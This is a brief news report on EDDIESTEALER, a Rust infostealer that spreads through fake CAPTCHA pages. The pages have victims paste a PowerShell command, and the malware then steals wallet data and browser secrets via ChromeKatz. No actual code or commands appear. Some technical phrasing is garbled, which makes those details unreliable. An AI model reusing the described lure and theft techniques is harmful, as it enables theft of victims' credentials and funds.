Cybersecurity firm Elastic Security Labs has uncovered EDDIESTEALER, a new Rust-based type of “infostealer” malware that is specifically designed to gain access to personal data like passwords, browser information, and computer passwords.
In order to lure in their victims, hackers fake “I’m not a robot” CAPTCHA pop-ups on malicious websites.
The bogus page instructs you to paste a PowerShell command, which secretly runs a malicious PowerShell script that downloads a second script, which eventually saves the EDDIESTEALER Rust binary.
The above-mentioned malware decrypts its hidden core, secretly loads Windows functions, and creates the hackers’ servers, which present a list of tasks.
The malware scans your computer can scan your computer for files related to crypto (wallet config files, JSON keystrokes, and so on).
You Might Also Like
It could potentially extract private keys, seed phrases, wallet passwords, and so on. In such a way, it would be possible for an attacker to easily drain your wallet.
Chromium-based browsers encrypt sensitive user data such as passwords or session tokens, but the malware is capable of bypassing this encryption with the help of the ChromeKatz tool. The tool can access the browser’s memory and extract sensitive data.
After stealing the data of its unfortunate victims, the malware ends up deleting itself in order to cover its tracks.
Source link
